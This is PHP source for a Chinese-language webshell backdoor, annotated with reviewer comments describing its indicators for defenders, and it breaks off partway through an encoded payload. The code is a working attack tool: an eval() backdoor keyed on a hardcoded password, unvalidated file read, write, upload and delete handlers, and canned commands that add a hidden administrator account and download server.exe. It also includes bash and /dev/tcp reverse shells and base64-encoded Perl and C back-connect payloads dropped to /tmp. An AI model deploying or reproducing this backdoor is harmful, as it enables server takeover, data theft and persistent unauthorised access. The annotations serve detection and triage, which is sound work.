<?php
// NOTE(review): this file is a PHP webshell (remote administration backdoor),
// kept in the corpus as a sample. The comments added here describe what the code
// does so that defenders can build detections and triage infections; the code is
// deliberately NOT hardened or "fixed" -- it is the threat, not the application.
//
// Indicators visible elsewhere in this same file (later lines): request parameter
// `eanver` used as the action dispatcher; cookie `postpass` holding md5(password);
// cookies `yourip`/`yourport` for the reverse-shell target; files `/tmp/envl_bc`
// and `/tmp/envl_bc.c` dropped on Linux; canned Windows command `net user mysql$ envl /add`;
// a MySQL scratch table named `a` used to write files via INTO DUMPFILE;
// fake prompt string ` [r00t@yzddmr6:/root]# ` sent over the netcat-style channel.
header("Content-type:text/html;charset=gbk");
// Cleartext shared secret. It is BOTH the login password (cookie flow below)
// and the name of the request parameter that triggers the eval() backdoor.
$password='chuabdnklajwieowa';
$shellname='FUCK you mother!!!';
$myurl=null;
// Silence every PHP warning/notice so failed calls never surface in logs or output.
error_reporting(0);
ob_start();
define('myaddress',$_SERVER['SCRIPT_FILENAME']);
define('postpass',$password);
define('shellname',$shellname);
define('myurl',$myurl);
// Undo magic_quotes so attacker-supplied quotes/backslashes reach eval()/shell intact.
if(@get_magic_quotes_gpc()){
 foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
 foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
}
// Primary backdoor, evaluated BEFORE the cookie login check: any GET/POST/COOKIE
// parameter whose *name* is the password string has its *value* handed to eval()
// as PHP code. This is the "one-liner client" entry point (same shape as the classic
// `eval($_POST[...])` shells). hmlogin() is defined elsewhere in the file and is not
// visible here -- presumably a login/notification hook; confirm in the full source.
if(isset($_REQUEST[postpass])){
hmlogin(2);
@eval($_REQUEST[postpass]);
exit;}
// Interactive "login": authentication state is a cookie named `postpass` whose value
// must equal md5($password). Note the loose `!=` / `==` comparisons and the absence of
// any session, rate limit or constant-time compare -- typical of webshell auth.
// If the cookie is absent or wrong, a POSTed `postpass` equal to the password sets
// the cookie; otherwise the login form is rendered by islogin() (defined elsewhere,
// not visible here) and the script exits. Detection tip: a request to this script
// carrying a `postpass` cookie that is a 32-hex-char value is a strong signal.
if($_COOKIE['postpass'] != md5(postpass)){
 if($_POST['postpass']){
 if($_POST['postpass'] == postpass){
 setcookie('postpass',md5($_POST['postpass']));
 hmlogin();
 }else{
 echo '<CENTER>用户或密码错误</CENTER>'; // "wrong user or password"
 }
 }
 islogin($shellname,$myurl);
 exit;
}
32
// Post-login file exfiltration / archive handlers driven purely by GET parameters.
// No path validation is applied to any of them: the raw query value is passed to
// the helper. do_down(), do_show(), the `eanver` class, do_download() and
// start_unzip() are defined elsewhere in the file and are not visible here.
//   ?down=<path>             -> do_down(): presumably streams the file to the client
//   ?pack=<dir>              -> packs a directory and serves it as "<Host header>.tar.gz"
//   ?unzip=<archive>&todir=  -> extracts an archive on the server, then exits
if(isset($_GET['down'])) do_down($_GET['down']);
if(isset($_GET['pack'])){
 $dir = do_show($_GET['pack']);
 $zip = new eanver($dir);
 $out = $zip->out;
 // Download name is built from the attacker-controllable Host header.
 do_download($out,$_SERVER['HTTP_HOST'].".tar.gz");
}
if(isset($_GET['unzip'])){
 css_main();
 start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
 exit;
}
45
// Environment constants and request-parameter intake for the main UI.
// root_dir  = directory containing this script, forward-slash normalised.
// run_win   = true when PHP_OS starts with "WIN" (drives OS-specific branches later).
// my_shell  = this script's own path; str_path() is defined elsewhere (not visible).
define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
define('run_win',substr(PHP_OS, 0, 3) == "WIN");
define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
// `eanver` (GET) is the action selector consumed by the big switch further down.
// `path` and `p` are filesystem paths taken verbatim from the query string;
// `pp` is the URL-encoded parent directory of `p`, used for redirect links.
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p));
// ?img=<name> serves an embedded UI image via css_img() (defined elsewhere).
if($img) css_img($img);
// ?eanver=phpinfo dumps full phpinfo() output (server reconnaissance) and stops.
if($eanver == "phpinfo") die(phpinfo());
// ?eanver=logout clears the auth cookie and bounces back to the login form.
if($eanver == 'logout'){
 setcookie('postpass',null);
 die('<meta http-equiv="refresh" content="0;URL=?">');
}
62
// Sidebar menu: group label => (eanver action => display label). The action keys
// are the values of the `eanver` parameter; they enumerate the shell's feature set
// and make good detection strings. English gloss of the labels:
//   "信息操作" (info):      upfiles=upload files, phpinfo=basic info, info_f=system info,
//                           phpcode=run PHP code
//   "提权工具" (privesc):   sqlshell=run SQL, mysql_exec=MySQL ops, myexp=MySQL privesc,
//                           servu=Serv-U privesc, cmd=run OS command, linux=reverse shell,
//                           downloader=fetch file from URL, port=port scan
//   "批量操作" (batch):     guama=mass inject/clean "trojan" code, tihuan=mass replace,
//                           scanfile=mass file search, scanphp=mass search for webshells
//   "脚本插件" (plugins):   getcode=online proxy
$class = array(
"信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","phpcode" => "执行PHP脚本"),
"提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","cmd" => "执行命令","linux" => "反弹提权","downloader" => "文件下载","port" => "端口扫描"),
"批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文件","scanphp" => "批量查找木马"),
"脚本插件" => array("getcode" => "在线代理")
);
// Status strings indexed by the case bodies below:
// 0/1 save ok/failed, 2/3 upload ok/failed, 4/5 modify ok/failed, 6/7 delete ok/failed.
$msg = array("0" => "保存成功","1" => "保存失败","2" => "上传成功","3" => "上传失败","4" => "修改成功","5" => "修改失败","6" => "删除成功","7" => "删除失败");
// Emits the page chrome/CSS (defined elsewhere); the action switch follows.
css_main();
71switch($eanver){
72 case "left":
73 css_left();
74 html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items1');\" target=\"_self\">");
75 html_img("title");html_n(" 本地硬盘</a></dt><dd id=\"items1\" style=\"display:block;\"><ul>");
76 $ROOT_DIR = File_Mode();
77 html_n("<li><a title='$ROOT_DIR' href='?eanver=main&path=$ROOT_DIR' target='main'>网站根目录</a></li>");
78 html_n("<li><a href='?eanver=main' target='main'>本程序目录</a></li>");
79 for ($i=66;$i<=90;$i++){$drive= chr($i).':';
80 if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive;
81 html_n("<li><a title='$drive' href='?eanver=main&path=$drive' target='main'>本地磁盘($drive)</a></li>");}}
82 html_n("</ul></dd></dl>");
83 $i = 2;
84 foreach($class as $name => $array){
85 html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
86 html_img("title");html_n(" $name</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
87 foreach($array as $url => $value){
88 html_n("<li><a href=\"?eanver=$url\" target='main'>$value</a></li>");
89 }
90 html_n("</ul></dd></dl>");
91 $i++;
92 }
93 html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
94 html_img("title");html_n(" 其它操作</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
95 html_n("<li><a title='安全退出' href='?eanver=logout' target=\"main\">安全退出</a></li>");
96 html_n("</ul></dd></dl>");
97 html_n("</div>");
98 break;
99
100 case "main":
101 css_js("1");
102 $dir = @dir($path);
103 $REAL_DIR = File_Str(realpath($path));
104 if(!empty($_POST['actall'])){echo '<div class="actall">'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'</div>';}
105 $NUM_D = $NUM_F = 0;
106 if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
107 $ROOT_DIR = File_Mode();
108 html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>地址:<input type='hidden' name='eanver' value='main'>");
109 html_n("<input type='text' size='80' name='path' value='$path'> <input type='submit' value='转到'></form>");
110 html_n("<br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=".urlencode($path)."'>");
111 html_n("<input type=\"button\" value=\"新建文件\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=".urlencode($path)."&refile=1&name=');\"> <input type=\"button\" value=\"新建目录\" onclick=\"rusurechk('newdir','?eanver=editr&p=".urlencode($path)."&redir=1&name=');\">");
112 html_input("file","upfilet",""," ");
113 html_input("submit","uploadt","上传");
114 if(!empty($_POST['newfile'])){
115 if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb";
116 $newfile=base64_decode($_POST['newfile']);
117 if(strtolower($_POST['charset'])=='utf-8'){$txt=base64_decode($_POST['txt']);}else{$txt=$_POST['txt'];}
118 if (substr(PHP_VERSION,0,1)>=5){if((strtolower($_POST['charset'])=='gb2312') or (strtolower($_POST['charset'])=='gbk')){$txt=iconv("UTF-8","gb2312//IGNORE" ,base64_decode($_POST['txt']));}else{$txt = array_iconv($txt);}}
119 echo do_write($newfile,$bin,$txt) ? '<br>'.$newfile.' '.$msg[0] : '<br>'.$newfile.' '.$msg[1];
120 @touch($newfile,@strtotime($_POST['time']));
121 }
122 html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path='.$path.'"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>');
123 html_a('?eanver=main&path='.uppath($path),'<b>上级目录</b>');
124 html_n('</b></td><td align="center" width="10%"><b>操作</b></td><td align="center" width="5%"><b>文件属性</b></td>');
125 html_n('<td align="center" width="8%"><b>('.get_current_user().')用户|组</b></td>');
126 html_n('<td align="center" width="10%"><b>修改时间</b></td><td align="center" width="10%"><b>文件大小</b></td></tr>');
127 while($dirs = @$dir->read()){
128 if($dirs == '.' or $dirs == '..') continue;
129 $dirpath = str_path("$path/$dirs");
130 if(is_dir($dirpath)){
131 $perm = substr(base_convert(fileperms($dirpath),10,8),-4);
132 $filetime = @date('Y-m-d H:i:s',@filemtime($dirpath));
133 $dirpath = urlencode($dirpath);
134 html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$dirs.'">');
135 html_img("dir");
136 html_a('?eanver=main&path='.$dirpath,$dirs);
137 html_n('</td><td align="center">');
138 html_n("<a href=\"#\" onClick=\"rusurechk('$dirs','?eanver=rename&p=$dirpath&newname=');return false;\">改名</a>");
139 html_n("<a href=\"#\" onClick=\"rusuredel('$dirs','?eanver=deltree&p=$dirpath');return false;\">删除</a> ");
140 html_a('?pack='.$dirpath,'打包');
141 html_n('</td><td align="center">');
142 html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm);
143 html_n('</td><td align="center">'.GetFileOwner("$path/$dirs").':'.GetFileGroup("$path/$dirs"));
144 html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
145 html_n('</td></tr>');
146 $NUM_D++;
147 }
148 }
149 @$dir->rewind();
150 while($files = @$dir->read()){
151 if($files == '.' or $files == '..') continue;
152 $filepath = str_path("$path/$files");
153 if(!is_dir($filepath)){
154 $fsize = @filesize($filepath);
155 $fsize = File_Size($fsize);
156 $perm = substr(base_convert(fileperms($filepath),10,8),-4);
157 $filetime = @date('Y-m-d H:i:s',@filemtime($filepath));
158 $Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath);
159 $todir=$ROOT_DIR.'/zipfile';
160 $filepath = urlencode($filepath);
161 $it=substr($filepath,-3);
162 html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$files.'">');
163 html_img(css_showimg($files));
164 html_a($Fileurls,$files,'target="_blank"');
165 html_n('</td><td align="center">');
166 if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z'))
167 html_a('?unzip='.$filepath,'解压','title="解压'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"');
168 else
169 html_a('?eanver=editr&p='.$filepath,'编辑','title="编辑'.$files.'"');
170
171 html_n("<a href=\"#\" onClick=\"rusurechk('$files','?eanver=rename&p=$filepath&newname=');return false;\">改名</a>");
172 html_n("<a href=\"#\" onClick=\"rusuredel('$files','?eanver=del&p=$filepath');return false;\">删除</a> ");
173 html_n("<a href=\"#\" onClick=\"rusurechk('".urldecode($filepath)."','?eanver=copy&p=$filepath&newcopy=');return false;\">复制</a>");
174 html_a('?down='.$filepath,'下载','编辑','title="下载'.$files.'"');
175 html_n('</td><td align="center">');
176 html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm);
177 html_n('</td><td align="center">'.GetFileOwner("$path/$files").':'.GetFileGroup("$path/$files"));
178 html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
179 html_a('?down='.$filepath,$fsize,'title="下载'.$files.'"');
180 html_n('</td></tr>');
181 $NUM_F++;
182 }
183 }
184 @$dir->close();
185 if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8);
186print<<<END
187</table>
188<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined">
189<input type="hidden" id="inver" name="inver" value="undefined">
190<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);">
191<input type="button" value="复制" onclick="SubmitUrl('复制所选文件到路径: ','{$REAL_DIR}','a');return false;">
192<input type="button" value="删除" onclick="Delok('所选文件','b');return false;">
193<input type="button" value="属性" onclick="SubmitUrl('修改所选文件属性值为: ','0666','c');return false;">
194<input type="button" value="时间" onclick="CheckDate('{$Filetime}','d');return false;">
195<input type="button" value="打包" onclick="SubmitUrl('打包并下载所选文件下载名为: ','{$_SERVER['SERVER_NAME']}.tar.gz','e');return false;">
196目录({$NUM_D}) / 文件({$NUM_F})</div>
197</form>
198END;
199 break;
200
201 case "editr":
202print<<<END
203<script>
204END;
205html_base();
206print<<<END
207 </script>
208END;
209 css_js("2");
210 if(!empty($_POST['uploadt'])){
211 echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]);
212 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
213 }
214 if(!empty($_GET['redir'])){
215 $name=$_GET['name'];
216 $newdir = str_path($p.'/'.$name);
217 @mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]);
218 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
219 }
220
221 if(!empty($_GET['refile'])){
222 $name=$_GET['name'];
223 $jspath=urlencode($p.'/'.$name);
224 $pp = urlencode($p);
225 $p = str_path($p.'/'.$name);
226 $FILE_CODE = "";
227 $charset= 'GB2312';
228 $FILE_TIME =date('Y-m-d H:i:s',time()+3600*8);
229 if(@file_exists($p)) echo '发现目录下有"同名"文件<br>';
230 }else{
231 $jspath=urlencode($p);
232 $FILE_TIME = date('Y-m-d H:i:s',filemtime($p));
233 $FILE_CODE=@file_get_contents($p);
234 if (substr(PHP_VERSION,0,1)>=5){
235 if(empty($_GET['charset'])){
236 if(TestUtf8($FILE_CODE)>1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';}
237 }else{
238 if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);}
239 }
240 }
241 $FILE_CODE = htmlspecialchars($FILE_CODE);
242 }
243print<<<END
244<div class="actall">查找内容: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
245<input type="button" value="查找" onclick="search(searchs.value)"></div>
246<form method='POST' id="editor" action='?eanver=main&path={$pp}'>
247<div class="actall">
248<input type="text" name="newfile" id="newfile" value="{$p}" style="width:750px;">指定编码:<input name="charset" id="charset" value="{$charset}" Type="text" style="width:80px;" onkeydown="if(event.keyCode==13)window.location='?eanver=editr&p={$jspath}&charset='+this.value;">
249<input type="button" value="选择" onclick="window.location='?eanver=editr&p={$jspath}&charset='+this.form.charset.value;" style="width:50px;">
250END;
251html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\"");
252print<<<END
253</div>
254<div class="actall"><textarea name="txt" id="txt" style="width:100%;height:380px;">{$FILE_CODE}</textarea></div>
255<div class="actall">文件修改时间 <input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>以二进制形式保存文件(建议使用)</div>
256<div class="actall"><input type="button" value="保存" onclick="CheckDate();" style="width:80px;"> <input name='reset' type='reset' value='重置'>
257<input type="button" value="返回" onclick="window.location='?eanver=main&path={$pp}';" style="width:80px;"></div>
258</form>
259END;
260 break;
261
262 case "rename":
263 html_n("<tr><td>");
264 $newname = urldecode($pp).'/'.urlencode($_GET['newname']);
265 @rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]);
266 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
267 break;
268
269 case "deltree":
270 html_n("<tr><td>");
271 do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
272 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
273 break;
274
275 case "del":
276 html_n("<tr><td>");
277 @unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
278 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
279 break;
280
281 case "copy":
282 html_n("<tr><td>");
283 $newpath = explode('/',$_GET['newcopy']);
284 $pathr[0] = $newpath[0];
285 for($i=1;$i < count($newpath);$i++){
286 $pathr[] = urlencode($newpath[$i]);
287 }
288 $newcopy = implode('/',$pathr);
289 @copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);
290 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
291 break;
292
293 case "perm":
294 html_n("<form method='POST'><tr><td>".$p.' 属性为: ');
295 if(is_dir($p)){
296 html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']);
297 }else{
298 html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']);
299 }
300 html_input("submit","save","修改");
301 back();
302 if($_POST['class']){
303 switch($_POST['class']){
304 case "0777": $change = @chmod($p,0777); break;
305 case "0755": $change = @chmod($p,0755); break;
306 case "0555": $change = @chmod($p,0555); break;
307 case "0666": $change = @chmod($p,0666); break;
308 case "0644": $change = @chmod($p,0644); break;
309 case "0444": $change = @chmod($p,0444); break;
310 }
311 $change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);
312 die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
313 }
314 html_n("</td></tr></form>");
315 break;
316
317 case "info_f":
318 $dis_func = get_cfg_var("disable_functions");
319 $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
320 $adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
321 if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
322 $phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
323 $info = array(
324 array("服务器时间",date("Y年m月d日 h:i:s",time())),
325 array("服务器域名","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
326 array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
327 array("服务器操作系统",PHP_OS),
328 array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
329 array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
330 array("你的IP",$_SERVER["REMOTE_ADDR"]),
331 array("Web服务端口",$_SERVER['SERVER_PORT']),
332 array("PHP运行方式",strtoupper(php_sapi_name())),
333 array("PHP版本",PHP_VERSION),
334 array("运行于安全模式",Info_Cfg("safemode")),
335 array("服务器管理员",$adminmail),
336 array("本文件路径",myaddress),
337 array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")),
338 array("允许使用curl_exec",Info_Fun("curl_exec")),
339 array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")),
340 array("显示错误信息 display_errors",Info_Cfg("display_errors")),
341 array("自动定义全局变量 register_globals",Info_Cfg("register_globals")),
342 array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
343 array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")),
344 array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")),
345 array("允许最大上传文件 upload_max_filesize",$upsize),
346 array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"),
347 array("被禁用的函数 disable_functions",$dis_func),
348 array("phpinfo()",$phpinfo),
349 array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
350 array("图形处理 GD Library",Info_Fun("imageline")),
351 array("IMAP电子邮件系统",Info_Fun("imap_close")),
352 array("MySQL数据库",Info_Fun("mysql_close")),
353 array("SyBase数据库",Info_Fun("sybase_close")),
354 array("Oracle数据库",Info_Fun("ora_close")),
355 array("Oracle 8 数据库",Info_Fun("OCILogOff")),
356 array("PREL相容语法 PCRE",Info_Fun("preg_match")),
357 array("PDF文档支持",Info_Fun("pdf_close")),
358 array("Postgre SQL数据库",Info_Fun("pg_close")),
359 array("SNMP网络管理协议",Info_Fun("snmpget")),
360 array("压缩文件支持(Zlib)",Info_Fun("gzclose")),
361 array("XML解析",Info_Fun("xml_set_object")),
362 array("FTP",Info_Fun("ftp_login")),
363 array("ODBC数据库连接",Info_Fun("odbc_close")),
364 array("Session支持",Info_Fun("session_start")),
365 array("Socket支持",Info_Fun("fsockopen")),
366 );
367 $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
368 echo '<table width="100%" border="0">';
369 for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
370try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");
371$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
372$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
373}catch(Exception $e){}
374 echo '<tr><td width="40%">Terminal Service端口为</td><td>'.$registry_proxystring.'</td></tr>'."\n";
375 echo '<tr><td width="40%">Telnet端口为</td><td>'.$Telnet.'</td></tr>'."\n";
376 echo '<tr><td width="40%">PcAnywhere端口为</td><td>'.$PcAnywhere.'</td></tr>'."\n";
377 echo '</table>';
378 break;
379
380
381 case "cmd":
382 $res = '回显窗口';
383 $cmd = 'whoami';
384 if(!empty($_POST['cmd'])){$res = Exec_Run(base64_decode($_POST['cmd']));$cmd = htmlspecialchars(base64_decode($_POST['cmd']));}
385
386print<<<END
387<script language="javascript">
388function sFull(i){
389 Str = new Array(11);
390 Str[0] = "dir";
391 Str[1] = "net user mysql$ envl /add";
392 Str[2] = "net localgroup administrators mysql$ /add";
393 Str[3] = "netstat -ano";
394 Str[4] = "ipconfig";
395 Str[5] = "tasklist /svc";
396 Str[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe";
397 Str[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123";
398 Str[8] = "bash -i >& /dev/tcp/{$_SERVER["REMOTE_ADDR"]}/2366 0>&1";
399 Str[9] = "netstat -tlnp";
400
401 document.getElementById('cmd').value = Str[i];
402 return true;
403}
404END;
405html_base();
406print<<<END
407function SubmitUrl(){
408 document.getElementById('cmd').value = base64encode(document.getElementById('cmd').value);
409 document.getElementById('gform').submit();
410}
411</script>
412<form method="POST" name="gform" id="gform" ><center><div class="actall">执行命令新增很多隐藏函数,外加使用BASE64加密提交,防止被拦(小细节,大成就)</div><div class="actall">
413命令参数 <input type="text" name="cmd" id="cmd" value="{$cmd}" onkeydown="if(event.keyCode==13)SubmitUrl();" style="width:399px;">
414<select onchange='return sFull(options[selectedIndex].value)'>
415<option value="0" selected>--命令集合--</option>
416<option value="1">添加管理员</option>
417<option value="2">设为管理组</option>
418<option value="3">查看端口</option>
419<option value="4">查看地址</option>
420<option value="5">查看进程</option>
421<option value="6">FTP下载</option>
422<option value="7">Linux反弹</option>
423<option value="8">bash反弹</option>
424<option value="9">Linux端口</option>
425</select>
426 <input type="button" value="执行" onclick="SubmitUrl();" style="width:80px;">
427</div>
428<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center>
429</form>
430END;
431 break;
432
433
434
435case "linux":
436
437 $yourip = $_COOKIE['yourip'] ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR');
438 $yourport = $_COOKIE['yourport'] ? $_COOKIE['yourport'] : '12388';
439
440 $system=strtoupper(substr(PHP_OS, 0, 3));
441print<<<END
442<div class="actall">使用方法:<br>
443 先在自己电脑运行"nc -vv -l 12388"<br>
444 然后在此填写你电脑的IP,点连接!此反弹很全很实用!包括NC反弹!</div>
445<form method="POST" name="kform" id="kform">
446<div class="actall">你的地址 <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div>
447<div class="actall">连接端口 <input type="text" name="yourport" value="{$yourport}" style="width:400px"></div>
448<div class="actall">执行方式 <select name="use" >
449<option value="perl">Perl</option>
450<option value="c">C</option>
451<option value="php">PHP</option>
452<option value="nc">NC</option>
453</select></div>
454<div class="actall"><input type="submit" value="开始连接" style="width:80px;"></div></form>
455END;
456 if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))
457 {
458 setcookie('yourip',$backip);
459 setcookie('yourport',$backport);
460
461 echo '<div class="actall">';
462 if($_POST['use'] == 'perl')
463 {
464 $back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
465 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
466 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
467 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
468 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
469 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
470 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
471 echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/envl_bc成功<br>' : '创建/tmp/envl_bc失败<br>';
472 $perlpath = Exec_Run('which perl');
473 $perlpath = $perlpath ? chop($perlpath) : 'perl';
474 @unlink('/tmp/envl_bc.c');
475 echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '执行命令失败';
476 }
477 if($_POST['use'] == 'c')
478 {
479 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
480 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
481 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
